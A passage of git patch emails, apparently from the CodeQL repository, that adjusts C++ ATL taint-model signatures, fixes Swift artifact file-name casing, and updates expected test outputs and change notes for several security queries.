True, "CComBSTR", "(CComBSTR &&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "Append", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] From 198417c63aa0d73d249ece159bafbf814f52ce58 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 16:28:04 +0100 Subject: [PATCH 0899/1267] Swift: fix filename case for prebuilt artifacts --- swift/third_party/load.bzl | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 455f7dfefee..d19345a1880 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -23,13 +23,13 @@ def _load_resource_dir(plat): if override: http_file( name = name, - downloaded_file_path = file, + downloaded_file_path = file.lower(), **override ) else: lfs_files( name = name, - srcs = ["//swift/third_party/resources:%s" % file], + srcs = ["//swift/third_party/resources:%s" % file.lower()], ) def _load_prebuilt(plat): @@ -52,14 +52,14 @@ def _load_prebuilt(plat): else: lfs_archive( name = name, - src = "//swift/third_party/resources:%s" % file, + src = "//swift/third_party/resources:%s" % file.lower(), build_file = build, ) # unused, but saves us some bazel mod tidy dance when in override mode lfs_files( name = name + "-download-only", - srcs = ["//swift/third_party/resources:%s" % file], + srcs = ["//swift/third_party/resources:%s" % file.lower()], ) def _github_archive(*, name, repository, commit, build_file = None, sha256 = None): From 904db38a5f3fae9580968a39fbbac3768c7f444b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:29:13 +0000 Subject: [PATCH 0900/1267] C++: Add missing space between type name and '&'. --- cpp/ql/lib/ext/CComBSTR.model.yml | 4 ++-- cpp/ql/lib/ext/CComSafeArray.model.yml | 4 ++-- cpp/ql/lib/ext/CPathT.model.yml | 4 ++-- cpp/ql/lib/ext/CRegKey.model.yml | 4 ++-- .../dataflow/external-models/flow.expected | 10 ++++----- .../external-models/validatemodels.expected | 8 +++---- .../taint-tests/test_mad-signatures.expected | 22 ++++++++++++++----- 7 files changed, 33 insertions(+), 23 deletions(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index 0cbf021a8a9..d281eb32dfb 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -7,9 +7,9 @@ extensions: - ["", "CComBSTR", True, "CComBSTR", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(CComBSTR &&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "Append", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml index 4128ae13e17..8da350ff140 100644 --- a/cpp/ql/lib/ext/CComSafeArray.model.yml +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml @@ -21,7 +21,7 @@ extensions: - ["", "CComSafeArray", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] - ["", "CComSafeArray", True, "operator LPSAFEARRAY", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - ["", "CComSafeArray", True, "operator[]", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml index 8211343d479..870e7ac5536 100644 --- a/cpp/ql/lib/ext/CPathT.model.yml +++ b/cpp/ql/lib/ext/CPathT.model.yml @@ -15,8 +15,8 @@ extensions: - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*2]", "ReturnValue[-1]", "taint", "manual"] - ["", "CPathT", True, "RenameExtension", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] # Note: These don't work currently since we cannot use the template parameter in the name of the function - # - ["", "CPathT", True, "operator const T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - # - ["", "CPathT", True, "operator T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + # - ["", "CPathT", True, "operator const T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + # - ["", "CPathT", True, "operator T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CPathT", True, "operator+=", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 52b742029ac..45114347ee0 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CRegKey", True, "CRegKey", "(CRegKey&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CRegKey", True, "CRegKey", "(CRegKey &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] @@ -12,7 +12,7 @@ extensions: - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(DWORD&,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 81a9c605f00..137642d522a 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:801 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:799 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:800 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:800 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:801 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 39dade25325..7b089db8a6d 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -11,14 +11,14 @@ | Dubious member name "operator=" in summary model. | | Dubious member name "operator[]" in summary model. | | Dubious signature "(CAtlFile &)" in summary model. | -| Dubious signature "(CRegKey&)" in summary model. | -| Dubious signature "(DWORD&,LPCTSTR)" in summary model. | +| Dubious signature "(CComBSTR &&)" in summary model. | +| Dubious signature "(CRegKey &)" in summary model. | +| Dubious signature "(DWORD &,LPCTSTR)" in summary model. | | Dubious signature "(InputIterator,InputIterator,const Allocator &)" in summary model. | | Dubious signature "(LPCTSTR,DWORD *,void *,ULONG *)" in summary model. | | Dubious signature "(LPTSTR,LPCTSTR,DWORD *)" in summary model. | -| Dubious signature "(const CComBSTR&)" in summary model. | +| Dubious signature "(const CComBSTR &)" in summary model. | | Dubious signature "(const CComSafeArray &)" in summary model. | -| Dubious signature "(const CComSafeArray&)" in summary model. | | Dubious signature "(const SAFEARRAY &)" in summary model. | | Dubious signature "(const SAFEARRAY *)" in summary model. | | Dubious signature "(const SAFEARRAYBOUND *,UINT)" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 9284dc759eb..f1e4b841d87 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -6,6 +6,10 @@ signatureMatches | atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:407:8:407:8 | operator= | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:407:8:407:8 | operator= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | +| atl.cpp:409:3:409:10 | CComBSTR | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:409:3:409:10 | CComBSTR | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | | atl.cpp:412:3:412:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | @@ -14,6 +18,9 @@ signatureMatches | atl.cpp:413:3:413:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | | atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:415:3:415:10 | CComBSTR | (CComBSTR &&) | CComBSTR | CComBSTR | 0 | +| atl.cpp:418:11:418:16 | Append | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:418:11:418:16 | Append | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | | atl.cpp:419:11:419:16 | Append | (wchar_t) | CComBSTR | Append | 0 | | atl.cpp:420:11:420:16 | Append | (char) | CComBSTR | Append | 0 | | atl.cpp:421:11:421:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | @@ -31,6 +38,8 @@ signatureMatches | atl.cpp:438:8:438:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:447:13:447:22 | operator+= | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:447:13:447:22 | operator+= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | | atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | | atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | @@ -357,9 +366,10 @@ signatureMatches | vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | (LPCOLESTR,int) | CComBSTR | Append | 1 | getSignatureParameterName | (CAtlFile &) | CAtlFile | CAtlFile | 0 | CAtlFile & | -| (CRegKey&) | CRegKey | CRegKey | 0 | CRegKey& | -| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 0 | DWORD& | -| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 1 | LPCTSTR | +| (CComBSTR &&) | CComBSTR | CComBSTR | 0 | CComBSTR && | +| (CRegKey &) | CRegKey | CRegKey | 0 | CRegKey & | +| (DWORD &,LPCTSTR) | CRegKey | QueryValue | 0 | DWORD & | +| (DWORD &,LPCTSTR) | CRegKey | QueryValue | 1 | LPCTSTR | | (HANDLE) | CAtlFile | CAtlFile | 0 | HANDLE | | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | HINSTANCE | | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | UINT | @@ -401,10 +411,10 @@ getSignatureParameterName | (UINT) | CComBSTR | LoadString | 0 | UINT | | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | UINT | | (char) | CComBSTR | Append | 0 | char | -| (const CComBSTR&) | CComBSTR | Append | 0 | const CComBSTR& | -| (const CComBSTR&) | CComBSTR | CComBSTR | 0 | const CComBSTR& | +| (const CComBSTR &) | CComBSTR | Append | 0 | const CComBSTR & | +| (const CComBSTR &) | CComBSTR | CComBSTR | 0 | const CComBSTR & | | (const CComSafeArray &) | CComSafeArray | CComSafeArray | 0 | const CComSafeArray & | -| (const CComSafeArray&) | CComSafeArray | operator= | 0 | const CComSafeArray& | +| (const CComSafeArray &) | CComSafeArray | operator= | 0 | const CComSafeArray & | | (const SAFEARRAY &) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY & | | (const SAFEARRAY *) | CComSafeArray | Add | 0 | const SAFEARRAY * | | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY * | From 4024968e46a1a0d55ccdd64cda036ab66a73abf2 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 15:30:02 +0000 Subject: [PATCH 0901/1267] Rust: Accept integration test changes. --- rust/ql/integration-tests/hello-project/summary.expected | 1 + rust/ql/integration-tests/hello-workspace/summary.cargo.expected | 1 + .../hello-workspace/summary.rust-project.expected | 1 + 3 files changed, 3 insertions(+) diff --git a/rust/ql/integration-tests/hello-project/summary.expected b/rust/ql/integration-tests/hello-project/summary.expected index 44c14e790fe..6912eb2c52d 100644 --- a/rust/ql/integration-tests/hello-project/summary.expected +++ b/rust/ql/integration-tests/hello-project/summary.expected @@ -5,6 +5,7 @@ | Files extracted - total | 5 | | Files extracted - with errors | 1 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 100 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | diff --git a/rust/ql/integration-tests/hello-workspace/summary.cargo.expected b/rust/ql/integration-tests/hello-workspace/summary.cargo.expected index ec1abea6252..27545551f12 100644 --- a/rust/ql/integration-tests/hello-workspace/summary.cargo.expected +++ b/rust/ql/integration-tests/hello-workspace/summary.cargo.expected @@ -5,6 +5,7 @@ | Files extracted - total | 4 | | Files extracted - with errors | 0 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 100 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | diff --git a/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected b/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected index 5ca38e5a90c..40992231f2b 100644 --- a/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected +++ b/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected @@ -5,6 +5,7 @@ | Files extracted - total | 4 | | Files extracted - with errors | 0 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 100 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | From f7b55e05ebcc1163e7a725043b6d7aa6e29100fc Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:30:34 +0000 Subject: [PATCH 0902/1267] C++: 'Attach' is value-preserving. --- cpp/ql/lib/ext/CComBSTR.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index d281eb32dfb..7ee43290ba3 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -19,7 +19,7 @@ extensions: - ["", "CComBSTR", True, "AppendBSTR", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[*0].Field[*pvData]", "value", "manual"] - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] From 6388a9af95051c49f484be6f296f8ad3b9c0a248 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:31:33 +0000 Subject: [PATCH 0903/1267] C++: Delete duplicated MaD row. --- cpp/ql/lib/ext/CComBSTR.model.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index 7ee43290ba3..cd3cd7b5075 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -26,7 +26,6 @@ extensions: - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "LoadString", "(UINT)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] From 66de42c576d64425456db4b7c7b1d45c085f18f8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:33:29 +0000 Subject: [PATCH 0904/1267] C++: Fix MaD row for 'operator&' on 'CComBSTR's. --- cpp/ql/lib/ext/CComBSTR.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index cd3cd7b5075..1865a244ef3 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -28,6 +28,6 @@ extensions: - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] \ No newline at end of file From 5aa604b42ce687ff2e0aacf9a800acd6b5c1382a Mon Sep 17 00:00:00 2001 From: Calum Grant <42069085+calumgrant@users.noreply.github.com> Date: Fri, 6 Dec 2024 15:34:57 +0000 Subject: [PATCH 0905/1267] Update cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md index df9e13c0704..1bf77d55a61 100644 --- a/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md @@ -1,4 +1,4 @@ --- category: minorAnalysis --- -* The "Wrong type of arguments to formatting function" query (`cpp/wrong-type-format-argument`) query no longer produces results when a string type has an extraction error. +* The "Wrong type of arguments to formatting function" query (`cpp/wrong-type-format-argument`) no longer produces results when an argument type has an extraction error. From e98129c402b2250b0cd0dfa0a08ab8124655a67c Mon Sep 17 00:00:00 2001 From: Calum Grant <42069085+calumgrant@users.noreply.github.com> Date: Fri, 6 Dec 2024 15:36:24 +0000 Subject: [PATCH 0906/1267] Update cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md index 2004cd08248..c7ddd104ad0 100644 --- a/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md +++ b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md @@ -1,4 +1,4 @@ --- category: minorAnalysis --- -* The "Badly bounded write" query (`cpp/badly-bounded-write`) query no longer produces results if there is an extraction error in the type of the output buffer. +* The "Badly bounded write" query (`cpp/badly-bounded-write`) no longer produces results if there is an extraction error in the type of the output buffer. From 7e5e634bc7504b663b5fb33a7953ff1ed4e1a2e6 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 15:41:28 +0000 Subject: [PATCH 0907/1267] Update .expected files (no new results) --- .../go/frameworks/BeegoOrm/StoredXss.expected | 6 +++ .../Security/CWE-078/StoredCommand.expected | 3 ++ .../Security/CWE-079/ReflectedXss.expected | 39 ++++++++++++++ .../Security/CWE-079/StoredXss.expected | 7 +++ .../Security/CWE-089/SqlInjection.expected | 9 ++++ .../Security/CWE-089/StringBreak.expected | 8 +++ .../CWE-209/StackTraceExposure.expected | 8 +++ .../CWE-312/CleartextLogging.expected | 53 +++++++++++++++++++ .../Security/CWE-640/EmailInjection.expected | 36 +++++++++++++ 9 files changed, 169 insertions(+) diff --git a/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected b/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected index 861e3e97ed1..7524dd0f410 100644 --- a/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected +++ b/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected @@ -24,7 +24,11 @@ edges | test.go:148:16:148:23 | &... | test.go:149:13:149:39 | type conversion | provenance | | | test.go:152:15:152:24 | &... | test.go:153:13:153:47 | type conversion | provenance | | | test.go:156:18:156:30 | &... | test.go:157:13:157:38 | type conversion | provenance | | +| test.go:160:2:160:23 | []type{args} [array] | test.go:160:14:160:22 | &... | provenance | | +| test.go:160:14:160:22 | &... | test.go:160:2:160:23 | []type{args} [array] | provenance | | | test.go:160:14:160:22 | &... | test.go:161:13:161:28 | type conversion | provenance | | +| test.go:164:2:164:25 | []type{args} [array] | test.go:164:15:164:24 | &... | provenance | | +| test.go:164:15:164:24 | &... | test.go:164:2:164:25 | []type{args} [array] | provenance | | | test.go:164:15:164:24 | &... | test.go:165:13:165:32 | type conversion | provenance | | nodes | test.go:80:13:80:16 | &... | semmle.label | &... | @@ -76,8 +80,10 @@ nodes | test.go:153:13:153:47 | type conversion | semmle.label | type conversion | | test.go:156:18:156:30 | &... | semmle.label | &... | | test.go:157:13:157:38 | type conversion | semmle.label | type conversion | +| test.go:160:2:160:23 | []type{args} [array] | semmle.label | []type{args} [array] | | test.go:160:14:160:22 | &... | semmle.label | &... | | test.go:161:13:161:28 | type conversion | semmle.label | type conversion | +| test.go:164:2:164:25 | []type{args} [array] | semmle.label | []type{args} [array] | | test.go:164:15:164:24 | &... | semmle.label | &... | | test.go:165:13:165:32 | type conversion | semmle.label | type conversion | subpaths diff --git a/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected b/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected index 12be518a98b..a0b34cd05b4 100644 --- a/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected +++ b/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected @@ -3,12 +3,15 @@ edges | StoredCommand.go:11:2:11:27 | ... := ...[0] | StoredCommand.go:13:2:13:5 | rows | provenance | | | StoredCommand.go:13:2:13:5 | rows | StoredCommand.go:13:12:13:19 | &... | provenance | FunctionModel | +| StoredCommand.go:13:2:13:20 | []type{args} [array] 